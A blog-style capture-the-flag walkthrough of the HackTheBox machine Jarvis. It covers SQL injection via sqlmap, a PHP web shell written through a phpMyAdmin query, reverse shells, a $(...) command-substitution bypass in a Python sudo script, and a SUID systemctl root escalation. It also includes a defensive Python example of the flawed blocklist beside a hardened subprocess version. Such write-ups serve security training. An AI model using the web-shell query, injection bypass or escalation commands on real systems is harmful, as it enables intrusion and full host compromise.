Hey all! This is Shreya Pohekar. This walkthrough will solve Jarvis from hackthebox.
Jarvis is an easy Linux machine. The initial foothold on the box is based on exploiting a SQL injection to obtain the credentials of DBadmin. phpMyAdmin is accessible to anyone and can be logged into with those credentials. The initial shell is obtained by writing a web shell to the box from phpMyAdmin.
Escalation to user exploits a Python script that can be run with the privileges of that user.
Finally, escalating to root is based on abusing a SUID systemctl binary, as the user is allowed to run it.
With all that said, let's get started!
Starting with the nmap scan, I found two open ports: 22 and 80.
# nmap -sC -sV -o jarvis.nmap 10.10.10.143
So, obviously, further recon starts with port 80.
Visiting http://10.10.10.143 brought up a web page.
In the top left, supersecurehotel.htb was written, so I added an entry to /etc/hosts to check whether a different page would come up. But it didn't!
Getting the initial shell
Clicking through the buttons (Book Now), I found room.php taking a parameter named cod.
In the URL I tried appending a quote after cod=3 (as cod=3') and the page acted weird. I realized that this could be a SQL injection point, so I quickly captured the request in Burp and copied it to a file named room.req.
GET /room.php?cod=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept-Encoding: gzip, deflate
I ran sqlmap over the saved request:
# sqlmap -r room.req --batch --all
In the SQL dump I found the password for DBadmin to be imissyou.
Alongside manual enumeration, I started a gobuster scan that listed a few accessible directories, one of them being phpmyadmin. I could probably log in to the dashboard with the creds I had obtained.
# gobuster dir --url http://10.10.10.143 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Visiting http://10.10.10.143/phpmyadmin brought up a login page, and I entered the creds.
Kudos!! Got access to the dashboard.
Scrolling through all the databases, I found nothing interesting.
I then realized that a web shell could be written to disk by running a SQL query.
So I went to the SQL query section and ran the following query:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"
The query writes a simple web shell into a file named backdoor.php in the web root (/var/www/html).
The query ran successfully, and now I had a file on the server.
I checked that the file existed by visiting http://10.10.10.143/backdoor.php; a blank page confirmed it.
I captured this request in Burp and used a reverse shell from PentestMonkey as the cmd parameter.
In Burp you can URL-encode the payload with Ctrl+U. I also opened an nc listener on port 1234.
And got a shell as www-data.
Escalation to user: pepper
I then ran linpeas.sh on the box and found that www-data has the privilege to run /var/www/Admin-Utilities/simpler.py as user pepper.
I looked through the contents of the file and found a function that was pretty interesting: os.system() is called on user input, but to make things harder the developer has forbidden certain characters.
After some trial and error I found that $(command) is not among the forbidden characters; since the shell performs command substitution on it, the weak sanitization can be bypassed.
So supplying $(/bin/bash) executed bash with the privileges of pepper and gave us a shell.
But the shell wasn't usable (it gave no output for commands).
So I opened another listener on port 8888 and launched a PentestMonkey reverse shell from the shell I had obtained.
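Added example (not the simpler.py from the box, which I am not reproducing): a hypothetical reconstruction of the weak pattern, a character blocklist in front of os.system(), beside the hardened form that validates the target against an allow-list and runs ping through subprocess with an argv list and no shell. The blocklist contents, function names and the ping command are all assumptions.

```python
import ipaddress
import re
import subprocess

# Hypothetical reconstruction of the weak pattern (assumed, not the real
# script): a blocklist of shell metacharacters, after which the string is
# handed to os.system(), i.e. to /bin/sh -c.
FORBIDDEN = ["&", ";", "|", "`"]  # assumed blocklist; note "$(" is absent


def blacklist_allows(target: str) -> bool:
    """True if the blocklist would let the string reach os.system()."""
    return not any(ch in target for ch in FORBIDDEN)


def vulnerable_command(target: str) -> str:
    # The exact string /bin/sh -c would evaluate. The shell expands $(...)
    # before ping ever runs, so "$(id)" passes the blocklist and executes.
    return "ping -c 1 " + target


# Hardened form: allow-list validation plus argv execution with no shell.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_safe_target(target: str) -> bool:
    """Accept only an IP address literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(target) is not None


def build_argv(target: str) -> list:
    """argv list for ping; the target is one argument, never shell text."""
    if not is_safe_target(target):
        raise ValueError("target is not an IP address or hostname")
    return ["ping", "-c", "1", target]


def safe_ping(target: str) -> int:
    """Run ping without a shell and return its exit status."""
    proc = subprocess.run(build_argv(target), shell=False,
                          capture_output=True, text=True, timeout=10)
    return proc.returncode
```

The allow-list rejects a leading "-" as well, so a target can never be parsed as a ping option either.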
To upgrade to a proper TTY, perform the following steps (optional):
# python3 -c 'import pty;pty.spawn("/bin/bash")'
(press ctrl+z to background the shell)
# stty raw -echo;
# fg
(then press enter 2 times and you are back in the shell)
# stty rows 34 cols 134
# export TERM=xterm
Privilege escalation to root
During the earlier enumeration with linpeas.sh, I had found that systemctl had the SUID bit set, was owned by root and was group-owned by pepper, which was interesting. Now that I am pepper, I can escalate my privileges to root.
We can also find this with the command:
# find / -perm -4000 2>/dev/null
I googled privilege escalation with systemctl and found the GTFOBins entry. Nothing could be better!!
mktemp creates a uniquely named temporary file (in /tmp unless a directory is specified) and prints its path.
We then echo a basic shell into that file, which will be run with elevated privileges.
SYSTEMD_EDITOR tells systemctl edit which editor to launch; because systemctl is SUID root, it runs $TF as root when editing system.slice.
Note: A slice unit is a concept for hierarchically managing resources of a group of processes. service and scope units are placed in system.slice by default.
# TF=$(mktemp)
# echo /bin/sh > $TF
# chmod +x $TF
# SYSTEMD_EDITOR=$TF systemctl edit system.slice
And root is owned!!
That's all for the blog post!! Thanks for reading!! If you enjoyed the post, do like it!
Until then, Happy Hacking!!